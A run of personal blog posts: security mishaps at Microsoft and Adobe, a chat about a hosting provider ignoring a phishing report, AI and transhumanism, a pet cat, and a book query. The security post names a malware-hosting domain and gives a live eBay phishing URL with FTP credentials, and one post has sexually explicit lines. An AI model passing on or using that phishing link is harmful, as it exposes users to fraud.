Security is hard.

So the past few weks have been rough on Microsoft and on Adobe. First, a flaw in Microsoft SQL Server allows ASP sites to be compromised by a general SQL injection attack; then a flaw in the Adobe Flash player allows a miscreant to hijack the Web browsers of people with the Flash plugin installed.

In both cases, the vulnerabilities have been exploited to try to redirect surfers to a Web site at www.dota11.cn, which hosts a malicious script that tries to infect users’ computers with a virus.

That’s the old news.

The funny news–and believe me, I think this is fucking hysterical–is that one of the Web sites clobbered by the SQL injection attack is redmondmag.com, a Web site that is “the independent voice of the Microsoft IT community.” It’s a pro-Microsoft, look-how-great-we-are “news” site that has been so massively infected that…

uh…

…well, if you Google it, Google gives you a “this site may harm your computer” warning.

Many of the infected Web pages are pages about computer security–or, at least, apologies for Microsoft products masquerading as articles on computer security.

I know, I know, the real assholes here are the hackers, but still…goddammit, I can’t stop laughing.

Security is hard.

And it gets harder when ISPs are aware of security problems on their network but don’t care. And believe it or not, I’m not talking about iPower this time.

Actual IM transcript from a conversation with xmission.com:

Tacit: You are hosting a phish.
Tacit: ftp://webmaster:webmaster@204.228.142.40/.ws/eBayISAPIi.dll
catalyst: chill, you could send a notification to abuse@xmission.com or to phish@ebay.com or whatever they have now
Tacit: Sent it two weeks ago.
Tacit: And a week ago.
Tacit: No response, phish still active.
Tacit: Two weeks is a long time.
Tacit: Your abuse@ address appears to be routed straight to /dev/null.
catalyst: I’m not an xmission employee, so I can’t help, just thought I’d recommend some alternatives
rostrax: Abuse is a valid e-mail address and it is looked at.
rostrax: That would be my suggestion on what to do.
Tacit: Again?
Tacit: How many times do you think I should send the same email to abuse@xmission.com before I conclude that xmission supports and condones hacks and phishes on their network?
rostrax: How many times have you sent it?
Tacit: Four.
Tacit: First one two weeks ago.
rostrax: I cannot speak for our abuse team, but I’m sure they’ve looked into it
Tacit: If they’ved looked into it, and it’s still active, what conclusion would you draw from that?
Tacit: 204.228.142.40 is on your network, yes?
rostrax: It is one of the IP’s we have yes.
Tacit: And if you click on the above link, you would agree that it is definitely an eBay phish, yes?
rostrax: You have to understand business’ have certain ways of handling these things. It may take some time. Please be patient with us, if you could send another e-mail I would appreciate it greatly. Also cc it to rostrax [at] xmission.com
Tacit: I do understand that businesses operate certain ways; I run one myself. Two weeks to handle a phish? Even China Netcom deals with phish sites faster…
rostrax: I’m unsure of our particular policy, but if you can send the e-mail and cc me on it, I will look into it on Tuesday


Edit: It gets better. Apparently, this phish has been active on Xmission’s network since at least April 9th.

Teaching a Dog Calculus

This is actually a post about transhumanism and Outside Context Problems, and an epiphany I had last time I was in Chicago.

But first…

God damn did I wake up with a bad case of the hornies this morning. Jesus Christ in Heaven, I want to fuck. I want to feel soft skin against mine. I want to trace the curve of the neck with teeth and tongue. I want to hear the little intake of breath when I discover a sensitive spot. I want to rest my hand on the curve of the hip, I want to explore the roundness of breast with my fingertips. I want to run fingernails lightly up the back of the neck and see goosebumps form. Holy fuck it’s distracting.

Also, when I crawled out of bed and walked stumbled into the bathroom this morning, I was all like “Ow! Ow! Ouch! Ow! What the hell?” Some time last night, it seems, the cat had scoured the house for every smallish, vaguely cylindrical object he could find, and hidden them all underneath the rug in the bathroom. Pens, a plastic travel tube of Advil, a small bullet vibrator, an AA battery…it was like walking on marbles. WTF?

None of that is what I’m actually here to say.


I’ve been thinking a great deal these days about Outside Context Problems. Put briefly, an Outside Context Problem is what happens when a group, society, or civilization encounters something so far outside its own context and understanding that it is not able even to understand the basic parameters of what it has encountered, much less deal with it successfully. Most civilizations encounter such a problem only once.

For example, you’re a Mayan king. Life is pretty good for you; you’ve built a civilization at the pinnacle of technological achievement, you’ve dominated and largely pacified any competition you might have, you’ve created many wondrous things, and life is pretty comfortable.

Then, all at once, out of the blue, some folks clad in strange, impervious silver armor show up at your doorstep. They carry long sticks that belch fire and kill from great distances; some of them appear to have four legs; they claim to come from a place that you have never in your entire life even conceived might exist…

Civilizations that encounter Outside Context Problems end. Even if some members of the civilization survive, the civilization itself is irrevocably changed beyond recognition. Nothing like the original Native American societies exists today in any form that the pre-Columbians would recognize.

Typically, we think of Outside Context Problems in terms of situations that arise when one society has contact with another society that’s radically different and technologically far more advanced. But I don’t think it necessarily has to be that way.


In a sense, we are, right now, hard at work building our own Outside Context Problem, and it’s going to be internal, not external.

Right now, as I type this, one of the hottest fields of biomedical research is brain mapping and modeling. I’ve mentioned several times in the past the research being done by a Swiss group to model a mammalian brain inside a supercomputer; such a model is essentially a neuron-by-neuron, connection-by-connection emulation of a brain in a computer. Such an emulation will, presumably, act exactly like its biological counterpart; it is the connections and patterns of information, not the physical wetware, that makes a brain act like it does.

This group claims to be ten years from being able to model a human brain inside a computer. Ten years, and we may see the advent of true AI.


Let me backtrack a little. The field of AI has, so far, been disappointing. For decades, we have struggled to program computers to be smart. The problem is, we don’t really quite know what we mean by “smart.” Intelligence is not an easily defined thing; and it’s not like you can sit down and break up generalized, adaptive intelligence into a sequence of steps.

Oh, sure, we’ve produced expert systems that can design computer chips, simulate bridges, and play chess far better than a human can. In fact, we don’t even have grandmaster-level human/machine chess tournaments any more, because the machines always win. Always. Deep Blue, the supercomputer that beat human grandmaster Garry Kasparov in a much-publicized tournament, is by modern standards a cripple; ordinary desktop PCs today are more powerful.

But these are simple, iterative tasks. A chess-playing computer isn’t smart. It can’t do anything besides play chess, and it approaches chess as a simple iterative mathematical problem. That’s about where AI has been for the last four decades.

New approaches, though, are not about programming computers to act smart. They are about taking systems which are smart–brains–and rebuilding them inside a computer. If this approach works, we will create our own Outside Context Problem.


Human brains are pretty pathetic, from a hardware standpoint. Our neurons are painfully, agonizingly slow. They are slow to respond, they are slow to fire, they are slow to reset after they have fired, and they are slow to form new connections. All these things limit our cognitive capabilities; they impose constraints on how adaptable our intelligence is, and how smart we can become.

Computers are fast. They encode new information rapidly and efficiently. Raw computing power available from a given square inch of silicon real estate doubles roughly every eighteen months. Modeling a brain in a computer removes many of the constraints; such a modeled brain can operate more quickly and more efficiently, and as more computer power becomes available, the complexity of the model–the number of neurons modeled, the richness of the interconnections between them–increases too.


We humans like to make believe that we are somehow the apex of creation–and not just of creation, but of all possible creation. It pleases us to imagine that we are created in the image of some divine heavenly architect–that the universe and everything in it was made by some sapient being, that that sapient being is recognizable to us, and that that sapient being is like us. We like to tell ourselves that thre is no limit to human imagination, that human intellect can understand and achieve anything, and so on.

Now, all of this is really embarrassingly self-serving. It’s also easy enough to deflate. The human imagination is indeed limited, though by definition limitations in the things you can conceive of tend to be hard to see, because you…can not conceive of things you can not conceive of. (As one person once challenged me, without apparent irony: “Name something the human imagination can’t conceive of!”)

But its relatively easy to find some of the boundaries of human imagination. For example:

• Imagine one apple. Just an apple, floating alone on a plain white background. Easy to do, right?
Imagine three apples, perhaps arranged in a triangle, floating in stark white nothingness. Simple, yes? Four apples. Picture four apples in your head. Got it?

Now, picture 17,431 apples in your head, each unique. Visualize all of them together, and make your mental image contain each of those apples separately and distinctly. Got it? I didn’t think so.

• Imagine a cube in your head. Think of all the faces of the cube and how they fit together, Rotate the imaginary cube in your head. Got it going? Good.

Now imagine a seventeen-dimensional cube in your head. Picture what it would look like rotating through seventeen-dimensional space. Got it?

The first example indicates one particular kind of boundary on our imaginations: our limited resolving power when it comes to holding discrete images in our imagination. The second shows another boundary; our imaginations are circumscribed by the limitations of our experiences, as perceived and interpreted through finite (and, it must be said, quite limited) senses. Quantum mechanics and astrophysics often pose riddles whose math suggests behaviors we have a great deal of difficulty imagining, because our imaginations were formed through the experiences of a very limited slice of the universe: medium-sized, medium-density mass-bearing objects moving quite slowly with respect to one another. Go outside those constraints, and we may be able to understand the math, but the reality of the way these systems works is, at best, right at the threshold of the limitations of our imaginations.


Everyone who has ever owned a dog knows that dogs are capable of a surprisingly sophisticated sort of reasoning. Dogs understand that they are separate entities; they interact with other entities, such as other dogs and humans, in complex ways; they can differentiate between other living entities and non-living entities, for the most part (tough I’ve seen dogs who are confused by television images); they have emotional responses that mirror, on a simple scale, human emotional responses; they are capable of planning, problem-solving, and analytical reasoning.

They can not, however, learn calculus.

No matter how smart your dog is, there are things it can not understand and will never understand because of the biological constraints on its brain. You will never teach a dog calculus; in fact, a dog is not capable of understanding what calculus is.

Yes, I know you think your dog is very smart. No, your dog can’t learn calculus. Yes, you can too, if you set your mind to it; the point here is that there are realms of knowledge unavailable to the entire species, because all dogs, no matter how smart they may be in comparison to other dogs, lack the necessary cognitive tools to get there.

The intelligence of every organism is circumscribed in part by that organism’s physical biology. And just as they are entire reals and categories of knowledge unavailable to a dog, so too are there realms of knowledge unavailable to us. What are they? I don’t know; I can’t see them. That’s exactly the point.


To get back to the idea of artificial intelligence: A generalized AI would in many ways not be subject to the same limitations we are. One nice thing about modeled brains that isn’t true of human brains is that we can easily tinker with them. The human brain is limited in the total number of neurons within it by the size and shape of the human pelvis; we can’t fit larger brains through the birth canal. We have, in essence, encountered a fundamental evolutionary barrier.

Similarly, we can’t easily make neurons faster; their speed is limited by the complex biochemical cascade of events which makes them fire (contrary to popular belief, neurons don’t communicate via electrical signals; they change state electrochemically, by the movement of charged ions across a membrane, and the speed with which a signal travels is dependent on the speed with which ions can propagate across the membrane and then be pumped back again). They are limited in how quickly they can learn new things by the speed with which neurons can grow new interconnections, which is pretty painful, really.

But a model of a brain? What if we double the number of neurons? Increase the speed at which they send signals? Increase the efficiency with which new connections form? These are all obvious and logical paths to explore.

And the thing about generalized AI is that it’s so goddamn useful. We want it, and we’re working very hard toward it, because there are just so many things that our current, primitive computers are poor at, that generalized Ai would be good at.

And one of those things, as it happens, is likely to be improving itself.


The first generalized AI will be a watershed. Even if it isn’t very smart, it can easily be put to the task of making AIs that are smarter. And smarter still. Hell, just advances in the underlying processor power of the computer beneath it–whatever that computer may look like–will probably make it smarter. Able to think faster, hold more information, remember more…and able to have whatever senses we give it, including senses our own physiology doesn’t have.

The first generalized AI might not be smarter than us, but subsequent ones will, oh yes. You can bank on that. And that soon presents an Outside Context Problem.

Because how do we relate to a sapience that’s smarter than we are?

In transhumanist circles, this is called a singularity–a change so profound that the people before the singularity can not imagine what life after the singularity is like.

There have been many singularities throughout human history. The development of agriculture, the Iron Age, the development of industrialization–all of these created changes so profound that a person living in a time before these things could not imagine what life after these things is like. However, the advent of smart and rapidly-improving AI is different, because it presents a singularity and an Outside Context Problem all rolled up into one.

In past singularities, the fundamental nature of human beings and human intelligence have not changed. A Bronze Age human is not necessarily dumber than an Iron Age human. Less knowledgeable, perhaps, but not dumber. The Bronze Age human could not anticipate Iron Age technology, but if they meet, they will still recognize each other.

But a smarter-than-us AI is different, in the ways we are different from a dog. We would not–we cannot–understand the perception or experience of something smarter than we are, ay more than a dog can understand what it means to be human. And that presents an interesting challenge indeed.

Civilizations tend not to survive contact with Outside Context Problems.


Which brings me, at last, to an epiphany that I had while I was walking with dayo in Chicago.

Transhumanism is the notion that human beings can become, with the application of intelligence and will, more than we are right now. I’ve talked about it a great deal in the past, and talked about some of the reasons I am a transhumanist.

But here’s a new one, and I think it’s important.

Strong AI is coming. It’s really only a matter of time. We are learning that our own intelligence is the result of physical processes within our brain, not the result of magical supernatural forces or spirits. We are working on applying the results of this knowledge to the problem of creating things that are not-us but that are smart like us.

Now, there are several ways we can approach this. One is by creating models of ourselves in computers; another is by using advances in nanotechnology and biomedical science to make ourselves smarter, and improve the capabilities of our wet and slow but still serviceable brains.

Or, we can create something not based on us at all; perhaps by using adaptive neural networks to model increasingly complex systems in a sort of artificial evolutionary system, trying things at random and choosing the smartest of those things until eventually we create something as smart as us, but self-improving and altogether different.

Regardless, we have a choice. We can make ourselves into this new whatever-it-is, or we can make something entirely independent from us.

However we make it, it will likely become our successor. Civilizations tend not to survive contact with Outside Context Problems.

If we are to be replaced–and I think, quite honestly, that that is only a matter of time as well–I would rather that we are replaced by us, by Humanity 2.0, than see us replaced by something that is entirely not-us. And I think transhumanism, refined down to its most simple essence, is the replacing of us by us, rather than by something that is not-us.

Waking up

Every night, when I go to bed, the kitty Liam usully follows me and falls asleep on the pillow next to me. It’s really heart-meltingly cute, and would be even cuter if he didn’t have the habit of waking up at three o’clock in the morning and tearing around the apartment, or fighting with one of the stray cats around here through the sliding glass door onto the patio. (At least I assume that’s what they’re doing. Maybe they want to be friends, I don’t know. Regardless, they bat at each other through the glass; it’s about as noisy as a handful of marbles tossed into a blender.)

After the requisite “wake Franklin up in the middle of the night,” Liam comes back to bed and curls up on the pillow again until morning comes.

Morning brings with it sharp teeth. The cat, you see, usually wakes up before I do, and morning is his “pet me” time. He lets me know it’s “pet me” time by biting my nose until I’m awake, then biting my nose until I pet him.

Come to think of it, we have kind of a dysfunctional relationship, he and I. He badgers me into giving him attention, and I provide it.

I open my eyes each morning and see, blurry and out of focus, cat teeth right in front of my face. I can’t help but think this is the last sight of many a small prey animal throughout history, and that if I were small enough for him to eat, he would no doubt make me into an hors d’oeuvres in a heartbeat.

I keep my cell pone next to my bed, so this morning, when Liam woke me with his customary “Pet me! Pet me, hyooman, or I shall rip the nose from your face and devour it before your very eyes!” routine, I snapped some phone camera pics so you, too, can see what I go through every morning.

Notice how he grabs my face with his paws. This is so he can prevent me from moving my nose away.

His teeth and claws are very sharp. Weird, it is, that we as a species enjoy sharing our homes with small predators.

Well, THAT was fast…

All the folks I sent out query letters to say to expect an answer in 4-6 weeks.

I got an answer from one of the literary agents I queried today. She wants to see a formal proposal, sample chapter, and marketing plan.

*yikes*

I had planned on raiding Serpentshrine Cavern in WoW this weekend, but it looks like I’ll be writing a book proposal instead… *panics*

Fun Link o’ the Day: Chemistry

http://pubs.acs.org/cgi-bin/abstract.cgi/inocaj/2004/43/i11/abs/ic0352250.html

“Two novel ruthenium polypyridine complexes, [Ru(bpy)2Cl(BPEB)](PF6) and {[Ru(bpy)2Cl]2(BPEB)}(PF6)2 (BPEB = trans-1,4-bis[2-(4-pyridyl)ethenyl]benzene), were synthesized and their characterization carried out by means of elemental analysis, UV-visible spectroscopy, positive ion electrospray (ESI-MS), and tandem mass (ESI-MS/MS) spectrometry,” reads the abstract, “as well as by NMR spectroscopy and cyclic voltammetry.”

But oh, those wacky chemists. You have got to see the accompanying illustration of the macroscale molecular complexes in question.

Wish me luck!

So Gina and I have spent the past couple of nights revising and re-revising a query letter for the book on polyamory I’ve been on-again, off-again working on. It’s been great; she’s a veteran of this getting-books-published thing, with a couple of books already under her belt, so I was absolutely delighted when she volunteered to help. This project has been pushing on me lately, and I really would like to see it happen.

Anyway, the query letter is done, I’m working on a formal proposal (in case anyone should bite at the query), I’ve made a list of agents and publishers interested in this sort of material, and tomorrow I plan to start mailing the query out.

Wish me luck!